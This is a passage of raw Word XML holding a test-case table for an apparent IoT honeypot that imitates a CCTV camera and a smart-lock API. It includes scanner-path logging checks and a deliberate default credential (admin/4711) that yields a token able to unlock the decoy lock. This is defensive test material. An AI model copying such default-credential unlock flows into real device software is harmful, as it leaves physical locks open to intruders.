              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">guest / guest123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Login page with error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">'Invalid user name or password.' shown after 1 s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-HTTP-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypot (CCTV Camera)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify scanner paths are answered and logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /phpmyadmin/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Path /phpmyadmin/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">404 and http_request event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 404; event with path and status stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-LOCK-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypot (Smart Lock API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify a default credential returns an API token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running; port 8081 open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/v1/auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">admin / 4711</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">200 with bearer token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200; token and expiry returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-LOCK-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypot (Smart Lock API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the lock can be unlocked with the token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Token obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/v1/lock {action: unlock}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Bearer token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">lock_state = unlocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200 {"result":"ok","lock_state":"unlocked"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-LOCK-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypot (Smart Lock API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify status requires a token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/v1/status without token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
